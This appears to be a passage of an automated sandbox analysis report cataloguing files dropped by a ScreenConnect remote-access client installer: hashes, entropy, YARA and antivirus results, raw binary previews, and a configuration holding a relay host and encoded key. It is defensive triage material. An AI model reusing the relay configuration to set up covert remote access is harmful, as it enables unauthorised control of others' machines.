SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	598816
Entropy (8bit):	6.182826342545805
Encrypted:	false
SSDEEP:	6144:0ya9pDzjhf+YMojz3cZRzyyUs0Ny2rOfQyEAlVw72191BVi1NnfEQcYF2/R4IrNC:jajDzNZFjLcZRzyyh5/EA3wv1lSYGXk
MD5:	AB5FA8D90645878D587F386D0E276C02
SHA1:	A602A20735A1104851F293965F1FE4AB678BF627
SHA-256:	316BBF433F1F803D113ADF060C528CCC636656CEE26B90F5FEA011C1C73C7D16
SHA-512:	A181E23C8FA01BC1D9F0F9F95A5CA6112E2B61F34F4C1DA696D3CCABBBD942BCC81A3F4A60921328A6020D28AED8711C22BE33761CB685921D50FEA8B1D7B986
Malicious:	false
Yara Hits:	Rule: JoeSecurity_ScreenConnectTool, Description: Yara detected ScreenConnect Tool, Source: C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe, Author: Joe Security
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L.....]..........."...0.............".... ... ....@.. .......................`......0.....@.....................................O.... .................. )...@......$...8............................................ ............... ..H............text........ ...................... ..`.rsrc........ ......................@..@.reloc.......@......................@..B........................H.......LC..X.............................................................{D.....{E...V.(F.....}D.....}E......0..A........u1.......4.,/(G....{D....{D...oH...,.(I....{E....{E...oJ...... }.o )UU.Z(G....{D...oK...X )UU.Z(I....{E...oL...X...0..b........r...p......%..{D......%q4....4...-.&.+...4...oM....%..{E......%q5....5...-.&.+...5...oM....(N.....{O.....{P...V.(F.....}O.....}P....0..A........u6.......4.,/(G....{O....{O...oH...,.(I....{P....{P...oJ...... 1.c. )UU.

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsClient.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsCredentialProvider.dll

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32+ executable (DLL) (GUI) x86-64, for MS Windows
Category:	dropped
Size (bytes):	842248
Entropy (8bit):	6.268561504485627
Encrypted:	false
SSDEEP:	12288:q9vy8YABMuiAoPyEIrJs7jBjaau+EAaMVtw:P8Y4MuiAoPyZrJ8jrvDVtw
MD5:	BE74AB7A848A2450A06DE33D3026F59E
SHA1:	21568DCB44DF019F9FAF049D6676A829323C601E
SHA-256:	7A80E8F654B9DDB15DDA59AC404D83DBAF4F6EAFAFA7ECBEFC55506279DE553D
SHA-512:	2643D649A642220CEEE121038FE24EA0B86305ED8232A7E5440DFFC78270E2BDA578A619A76C5BB5A5A6FE3D9093E29817C5DF6C5DD7A8FBC2832F87AA21F0CC
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........}....}H..}H..}H.d~I..}H.dxIG.}H.dyI..}H..xI..}H..yI..}H..~I..}H..\|H8.}H..}H..}H2.}I..}H2..I..}HRich..}H........PE..d.....Gf.........." ...'.P...........H....................................... ......q.....`......................................... ...t....................P...y.......(......,4.....T.......................(.......@............`...............................text....O.......P.................. ..`.rdata...z...`...\|...T..............@..@.data....d.......0..................@....pdata...y...P...z..................@..@_RDATA...............z..............@..@.reloc..,4.......6...\|..............@..B................................................................................................................................................................................................................................................................

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	81696
Entropy (8bit):	5.861320173003981
Encrypted:	false
SSDEEP:	1536:QtyCl44uzbexI5kLP+VVVVVVVVVVVVVVVVVVVVVVVVVC7AB7gxv:78BxukLdEBY
MD5:	2C158A30F7274E1931860E434DE808A2
SHA1:	F649A56C9A598117D68CC6999627A937305DB6C7
SHA-256:	B623E67BEA356C1793F3C921C5838719ED8B879EFCD966E97EE753498B1618B5
SHA-512:	14BD481BF183CACAE210EB06AFF04870C6D53D3E7F095EA7F96A7EA227167E6A38EB20C9EDE9F36BF23D02C36182A463239B3A835D0BD28E8666C378F76FE64D
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....)............"...0..@...........^... ...`....@.. .......................`...... .....@..................................^..O....`.................. )...@.......]..8............................................ ............... ..H............text....>... ...@.................. ..`.rsrc........`.......B..............@..@.reloc.......@......................@..B.................^......H....... +..@2..................`]........................................(....^.(.......;...%...}....:.(......}....:.(......}....:.(......}........0..........s>....(....(....(....(....(.....(....(......s....}B....s....}C....~@...%-.&~?.....<...s ...%.@...o...+.....@...s ...o...+......A...s!...o...+}D.......B...s"...o...+.......(#...&......(#...& .... ...........($...&s....t......r...prs..p(%...(&...~>...%-.&...'...s(...%.>.....A...().......(........(+...o,...(-...t....

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\ScreenConnect.WindowsFileManager.exe.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	266
Entropy (8bit):	4.842791478883622
Encrypted:	false
SSDEEP:	6:TMVBd1IffVKNC7VrfC7VNQpuAKr5KNZk2ygAyONO5W4QIT:TMHdG3VO+Qg9LNZoE0Oo4xT
MD5:	728175E20FFBCEB46760BB5E1112F38B
SHA1:	2421ADD1F3C9C5ED9C80B339881D08AB10B340E3
SHA-256:	87C640D3184C17D3B446A72D5F13D643A774B4ECC7AFBEDFD4E8DA7795EA8077
SHA-512:	FB9B57F4E6C04537E8FDB7CC367743C51BF2A0AD4C3C70DDDAB4EA0CF9FF42D5AEB9D591125E7331374F8201CEBF8D0293AD934C667C1394DC63CE96933124E7
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <startup>.. <supportedRuntime version="v4.0" />.. <supportedRuntime version="v2.0.50727" />.. </startup>.. <runtime>.. <generatePublisherEvidence enabled="false" />.. </runtime>..</configuration>

C:\Program Files (x86)\ScreenConnect Client (3a24aebb8959bcfa)\system.config

Process:	C:\Windows\System32\msiexec.exe
File Type:	XML 1.0 document, ASCII text, with very long lines (470), with CRLF line terminators
Category:	dropped
Size (bytes):	960
Entropy (8bit):	5.761130718146684
Encrypted:	false
SSDEEP:	24:2dL9hK6E4dl/5dhuxlPH5ejiThPJ7+qHvH:chh7HH5dgxJ5jf7+qHv
MD5:	F4F4DA0A79377953DC66B07CA328DDBB
SHA1:	F9A58501DE58E20FE3A8864178D83140281EDF6B
SHA-256:	86ADB8449899E682C6E582ECCB968DE54D17C414F1AB8A430C49B7EBF015C5B1
SHA-512:	B9D2475EE63710C7772B242888DEBCA505B712B670459A5AC2E88DB6A73CF7727B89175BF94E74BD4E2F345853F804A0B747211764DA84A5FBE4EA78995B162C
Malicious:	false
Preview:	<?xml version="1.0" encoding="utf-8"?>..<configuration>.. <configSections>.. <section name="ScreenConnect.ApplicationSettings" type="System.Configuration.ClientSettingsSection, System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />.. </configSections>.. <ScreenConnect.ApplicationSettings>.. <setting name="ClientLaunchParametersConstraint" serializeAs="String">.. <value>?h=instance-xkznvd-relay.screenconnect.com&p=443&k=BgIAAACkAABSU0ExAAgAAAEAAQBhw2Nfb6ZuPKlEDIhhDVtAYuyd858SiHfXVlo7oudUHFIakFl%2fPS5vluFfI688c%2ffI5cXvCjgFShXpqsjscRe%2bvZHKSRm%2bteuE97Q6NBZ5oegi61HDzK9%2bJY6drnQvjn5O3W4R13ZtTHxRqVi92KIEihsQur1J2%2fL4Cjo7mR%2bTf3z2FvvhBA9AI44ir3hX7T6YCeKwSXIGWSjwulU6qmSUa0YOa6ak5ubRKh%2fug0gS3wbeTgSuaLTj1hdcHea2xRvqMqyIWF1MOawExDdmH4KtYMuNWGxsLao6ChTQtObulDnOQ2rzUTbk681GAIKtEvzer9DayT7dfK5gHsogR7Cx</value>.. </setting>.. </ScreenConnect.ApplicationSettings>..</configuration>

C:\ProgramData\Microsoft\Network\Downloader\edb.log

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	1.3073701773441193
Encrypted:	false
SSDEEP:	3072:5JCnRjDxImmaooCEYhlOe2Pp4mH45l6MFXDaFXpVv1L0Inc4lfEnogVsiJKrvrf:KooCEYhgYEL0In
MD5:	B860326E92840CB7CD56CB3E63863F4A
SHA1:	C636963358E7BCC762F81F86AD08837A16530339
SHA-256:	D9F354042DD254AD3EF86A845DDC42741BF30043E4EC4B97B143FA8271D88C92
SHA-512:	DB40CADF466B002D1D1331ACA62484A449C48A3B92D8D6DCCCD90E634A4E588F1F707027D32DFA1D27774514DD13D0DD5CDAD9B95D35F1D462F478BED7CADDAB
Malicious:	false
Preview:	z3..........@..@.;...{..................<...D./..;...{..................C:\ProgramData\Microsoft\Network\Downloader\.........................................................................................................................................................................................................................C:\ProgramData\Microsoft\Network\Downloader\..........................................................................................................................................................................................................................0u..................@...@..........................................#.................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.db

Process:	C:\Windows\System32\svchost.exe
File Type:	Extensible storage engine DataBase, version 0x620, checksum 0x0826b091, page size 16384, DirtyShutdown, Windows version 10.0
Category:	dropped
Size (bytes):	1310720
Entropy (8bit):	0.42217173987301654
Encrypted:	false
SSDEEP:	1536:ZSB2ESB2SSjlK/dvmdMrSU0OrsJzvdYkr3g16T2UPkLk+kTX/Iw4KKCzAkUk1kI6:Zaza/vMUM2Uvz7DO
MD5:	176E8C333947C521D297D6E77C426418
SHA1:	AF903F56A52DD5B3F73AA7F493A160FC8CAF00A5
SHA-256:	DF1B33FBCACBF28F6F64619D33387BDCCEC2224EC43AAB2F58D9BB95FF8A2D4E
SHA-512:	91167EE87CA2984AB35F77EBD2675EF105D88FFB48E7DDCDAE2AC6B22763198DDC3493369C234CC0453AEF2A9495B9FA4BE6D28E82FCA2866F3C24690367A048
Malicious:	false
Preview:	.&..... .......A.......X\...;...{......................0.!..........{A......\|..h.#.........................D./..;...{..........................................................................................................eJ......n....@...................................................................................................... ........;...{...............................................................................................................................................................................................2...{..................................u.......\|..................?.......\|...........................#......h.#.....................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Network\Downloader\qmgr.jfm

Process:	C:\Windows\System32\svchost.exe
File Type:	data
Category:	dropped
Size (bytes):	16384
Entropy (8bit):	0.07615075258281984
Encrypted:	false
SSDEEP:	3:n4YefNrlkjn13a/3FX+6rtillcVO/lnlZMxZNQl:4zfNxk53q1X+60Oewk
MD5:	1BD69135F85A7B144C0B5C33A9C80D6C
SHA1:	4218926DBF223DFBB2445B750D04C52C5058D410
SHA-256:	497FA9D4851B816D6E8CDB29C7DC1D81CE0A310DA68EFBF22C1ADB95154931A0
SHA-512:	0AA18AC9C1377FEED02ADA707E10DAB236353975BD9BB904942FCD24CA852F6E6844908AE3FEAC55E92C47DC153A4ED027416BAF214DD9A3BDA588A4EFD2D38D
Malicious:	false
Preview:	.........................................;...{.......\|.......{A..............{A......{A..........{A]................?.......\|..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\rundll32.exe.log

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	746
Entropy (8bit):	5.349174276064173
Encrypted:	false
SSDEEP:	12:Q3La/KDLI4MWuPTAOKbbDLI4MWuPJKAVKhaOK9eDLI4MNJK9P/JNTK9yirkvoDLb:ML9E4KlKDE4KhKiKhPKIE4oKNzKogE4P
MD5:	ED994980CB1AABB953B2C8ECDC745E1F
SHA1:	9E9D3E00A69FC862F4D3C30F42BF26693A2D2A21
SHA-256:	D23B54CCF9F6327FE1158762D4E5846649699A7B78418D056A197835ED1EBE79
SHA-512:	61DFC93154BCD734B9836A6DECF93674499FF533E2B9A1188886E2CBD04DF35538368485AA7E775B641ADC120BAE1AC2551B28647951C592AA77F6747F0E9187
Malicious:	false
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp

Process:	C:\Windows\System32\msiexec.exe
File Type:	PE32 executable (DLL) (GUI) Intel 80386, for MS Windows, InstallShield self-extracting archive
Category:	dropped
Size (bytes):	1110630
Entropy (8bit):	7.800118817272725
Encrypted:	false
SSDEEP:	24576:QUUGGVA5kuQ7Ye80NncfI59+5lwXoTl2cx:jGVyk7cer5IIvXobx
MD5:	845B0569D54305E62C6E8FFE198D217C
SHA1:	CD06C3D1554FE08099ADA4F4448A23A6422E6234
SHA-256:	4DA6C507C746CD07CA4546E723D0D145BBF4D26FF8DE13F1A0750EF323A89A2E
SHA-512:	AF45BB8199F2AF323B9954DA0D11EED51459708608D356BC40BD9D9189C02C2C902F533077724DD7C6A7068E564B5C8F621EF1032098CEF26ED26D5BF26E23FE
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........S.c.2.0.2.0.2.0..\|0.2.0..H0.2.0.Jq0.2.0.2.0.2.0..I0.2.0..y0.2.0..x0.2.0...0.2.0Rich.2.0................PE..L...9..P...........!.........H.......i.......................................p............@..............................*..l...x....@.......................P..d.......................................@...............h............................text............................... ..`.rdata..............................@..@.data....-..........................@....rsrc........@......................@..@.reloc.......P......................@..B................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\CustomAction.config

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	XML 1.0 document, Unicode text, UTF-8 (with BOM) text, with CRLF line terminators
Category:	dropped
Size (bytes):	228
Entropy (8bit):	5.069688959232011
Encrypted:	false
SSDEEP:	6:JiMVBdTMkI002VymRMT4/0xko57VrzW57VNQeuAW4QIT:MMHd41p2VymhsbOF93xT
MD5:	EB99EE012EB63C162EEBC1DF3A15990B
SHA1:	D48FD3B3B942C754E3588D91920670C087FCE7E9
SHA-256:	C5045C2D482F71215877EB668264EE47E1415792457F19A5A55651C3554CC7CD
SHA-512:	455EC01953EC27186FBEAD17C503B7F952474A80B41E986494697497ECEAB130AD81A5561373D6762B71EEC473D8E37CDE742F557E50233F7EB0E8FB8B0BE4AD
Malicious:	false
Preview:	.<?xml version="1.0" encoding="utf-8" ?>..<configuration>...<startup useLegacyV2RuntimeActivationPolicy="true">....<supportedRuntime version="v4.0" />....<supportedRuntime version="v2.0.50727" />...</startup>..</configuration>

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.Cab.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	4.62694170304723
Encrypted:	false
SSDEEP:	768:sqbC2wmdVdX9Y6BCH+C/FEQl2ifnxwr02Gy/G4Xux+bgHGvLw4:sAtXPC/Cifnxs02Gyu4Xu0MeR
MD5:	77BE59B3DDEF06F08CAA53F0911608A5
SHA1:	A3B20667C714E88CC11E845975CD6A3D6410E700
SHA-256:	9D32032109FFC217B7DC49390BD01A067A49883843459356EBFB4D29BA696BF8
SHA-512:	C718C1AFA95146B89FC5674574F41D994537AF21A388335A38606AEC24D6A222CBCE3E6D971DFE04D86398E607815DF63A54DA2BB96CCF80B4F52072347E1CE6
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ...............................$....@....................................O.................................................................................... ............... ..H............text... .... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.Compression.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	36864
Entropy (8bit):	4.340550904466943
Encrypted:	false
SSDEEP:	384:GqJxldkxhW9N5u8IALLU0X9Z1kTOPJlqE:GqJxl6xsPIA9COxlqE
MD5:	4717BCC62EB45D12FFBED3A35BA20E25
SHA1:	DA6324A2965C93B70FC9783A44F869A934A9CAF7
SHA-256:	E04DE7988A2A39931831977FA22D2A4C39CF3F70211B77B618CAE9243170F1A7
SHA-512:	BB0ABC59104435171E27830E094EAE6781D2826ED2FC9009C8779D2CA9399E38EDB1EC6A10C1676A5AF0F7CACFB3F39AC2B45E61BE2C6A8FE0EDB1AF63A739CA
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0..`... .......~... ........... ....................................@.................................X~..O................................... }............................................... ............... ..H............text....^... ...`.................. ..`.rsrc................p..............@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.Package.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	57344
Entropy (8bit):	4.657268358041957
Encrypted:	false
SSDEEP:	768:BLNru62y+VqB4N5SBcDhDxW7ZkCmX2Qv1Sf0AQdleSBRxf+xUI3:BJ2yUGmh2O11AsleyRxf+xt
MD5:	A921A2B83B98F02D003D9139FA6BA3D8
SHA1:	33D67E11AD96F148FD1BFD4497B4A764D6365867
SHA-256:	548C551F6EBC5D829158A1E9AD1948D301D7C921906C3D8D6B6D69925FC624A1
SHA-512:	E1D7556DAF571C009FE52D6FFE3D6B79923DAEEA39D754DDF6BEAFA85D7A61F3DB42DFC24D4667E35C4593F4ED6266F4099B393EFA426FA29A72108A0EAEDD3E
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ........... ........... ....................... .......t....@.....................................O...................................`................................................ ............... ..H............text....... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\Microsoft.Deployment.WindowsInstaller.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	176128
Entropy (8bit):	5.775360792482692
Encrypted:	false
SSDEEP:	3072:FkfZS7FUguxN+77b1W5GR69UgoCaf8TpCnfKlRUjW01Ky4:x+c7b1W4R6joxfQE
MD5:	5EF88919012E4A3D8A1E2955DC8C8D81
SHA1:	C0CFB830B8F1D990E3836E0BCC786E7972C9ED62
SHA-256:	3E54286E348EBD3D70EAED8174CCA500455C3E098CDD1FCCB167BC43D93DB29D
SHA-512:	4544565B7D69761F9B4532CC85E7C654E591B2264EB8DA28E60A058151030B53A99D1B2833F11BFC8ACC837EECC44A7D0DBD8BC7AF97FC0E0F4938C43F9C2684
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....F.Y.........." ..0...... ......~.... ........... ..............................!\|....@.................................,...O.................................................................................... ............... ..H............text....w... ...................... ..`.rsrc...............................@..@.reloc..............................@..B........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Core.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	546304
Entropy (8bit):	6.03286879586464
Encrypted:	false
SSDEEP:	6144:hAUz5UEsIXxk3QCLKSkGEexE77VcYbUinCLrDfElYzMsdqe1J6tMznSAiOUfw8qg:hK67tEshnkDfyt9MznZd8PTIP8
MD5:	3B1BA4BEBEFDC8A95B0F2F0B4E50C527
SHA1:	15551D2E8BFB829F3A96D161B43DE820C0D417CE
SHA-256:	A843B3A4549C43EF5BD8470CACF5D2F0F3B3C8110441FCC10079FACC7DB3DE29
SHA-512:	F41595586CD5330537F5F02B392310B028E36F618E2583D125430ECD103EBBF6D2CF6BEFCFB1B32279EEB9FD7EF018F49131E3906FB61BC324DA85D93A9A18C7
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L................." ..0..N...........i... ........... ....................................@..................................h..O.......t...........................<h..8............................................ ............... ..H............text...@M... ...N.................. ..`.rsrc...t............P..............@..@.reloc...............T..............@..B.................i......H........@...&...................g........................................{:.....{;...V.(<.....}:.....};......0..A........u~.......4.,/(=....{:....{:...o>...,.(?....{;....{;...o@...... ... )UU.Z(=....{:...oA...X )UU.Z(?....{;...oB...X...0..b........r...p......%..{:......%q.........-.&.+.......oC....%..{;......%q.........-.&.+.......oC....(D.....{E.....{F...V.(<.....}E.....}F....0..A........u........4.,/(=....{E....{E...o>...,.(?....{F....{F...o@...... F.b# )UU.

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.InstallerActions.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	22016
Entropy (8bit):	5.19884453207748
Encrypted:	false
SSDEEP:	384:SBHH+yElQjHVPioy4cDphaC/GeXczrMRbx1kjvdNU5yYoJ37dbr9DO:hrCtPcDCyXcMJ5yp7dbtO
MD5:	9260AFE4BBDE2549FC0B92F657C2E50A
SHA1:	5580778A62B06D7B56D3F788727514551DE31647
SHA-256:	588D3A5E1B91D3756F74EA61C9C1B5F7871AF924FAB469CEBB579F8AEB2FC135
SHA-512:	AFCE644EE04813E1E323B719E8AD3CFEFE6E20AD0AA821F1325B8E0AE0144A7CFF4E0F1F4B6F45DF33F060392F94BCFD88D62B2218FD0BC573D65A20D80E968B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....zJ..........." ..0..N.........."m... ........... ....................................@..................................l..O................................... l..8............................................ ............... ..H............text...(M... ...N.................. ..`.rsrc................P..............@..@.reloc...............T..............@..B.................m......H........2...9...................k........................................(....^.(......./...%...}....:.(......}....:.(......}....:.(......}........0..h.......s#......}.....s....}.....{....r...p(......,h.{....r...p......%...(.....rS..p.(....~....%-.&~......"...s....%......(...+%-.&+.(.......$...s....(...+&.{....o....-!.{.....{.....{....rc..po....(.....{....o.........{.....{.....{....r}..po....(.....{....o....-..{....r...p......(......{....s .....-..o!.......{....r}..p.o

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\ScreenConnect.Windows.dll

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
Category:	dropped
Size (bytes):	1721344
Entropy (8bit):	6.638160977312247
Encrypted:	false
SSDEEP:	24576:jQNtbLFj+Ifz3zvnXj/zXzvAAkGz8mvgtX79S+2bfh+RfmT01krTFiH4SqfKPTs5:jebLJkGYYpT0+TFiH7efP
MD5:	D196174CF03F86C8776E717F07D5D19F
SHA1:	BBD2C6A59229B3E4EC7C5742248F3F55A61DD216
SHA-256:	A1EDD67A131505CC84D76601474C53874A56B5437B835838E4A866E20F6CD264
SHA-512:	CF4D159BCB42A1A7EA03F8877736CACE109AE79998906B9178C74F7A9B63030CDDC2BC94EF6C5F718E99C2D0039CF3589F8C4F2BF5B67DB94B3B96D2C988B45B
Malicious:	false
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....A............" ..0..<..........Z[... ...`....... ....................................@..................................[..O....`..\|...........................dZ..8............................................ ............... ..H............text...h;... ...<.................. ..`.rsrc...\|....`.......>..............@..@.reloc...............B..............@..B................;[......H.......,...................0....Y........................................()...^.()..........%...}....:.().....}....:.().....}....:.().....}......s.....s+...:.(,.....(-.....{...."..}....J.(/........(0...&:.(,.....(1.....{2..."..}2....0..(........(3......+.............(0...&..X....i2.v.(,....s4...}.....s5...}....v.{.....r...p(...+.....o7.....0...........o8....+..o9......(...+&.o....-....,..o................."........{..........o:...&.......(.........0..L...

C:\Users\user\AppData\Local\Temp\MSIBC6.tmp-\TransformAppConfigXml.xsl

Process:	C:\Windows\SysWOW64\rundll32.exe
File Type:	exported SGML document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	5358
Entropy (8bit):	5.152842845836485
Encrypted:	false
SSDEEP:	48:6al5t7Bh14CGwFTwGqwFdwwA14XFUjF4OSMS5+ZL+FKwsiMS6g/VMS5JtD9FmoG6:6dQmN6MSzOE9FEFWFqFWcNH0eSYIZj
MD5:	8BD7F5FAA7C10C7BD3DADF217622D3C5
SHA1:	DEDA0F0C8521A9D6F94F76C528249504E0EE1FB9
SHA-256:	378CA2D1E4663403C3C43F1A4928821D9E6CF10BE535C084A23FF5B54C3B72DD
SHA-512:	0681765200BD3E5DFA81C0F2BBD156CFA70B91433DDA02F1DB0F440CB697E6399C3177B821CE62535003E9E3849D5B695E4DCAB6593CAFC70E673EEF99D2ACB5
Malicious:	false
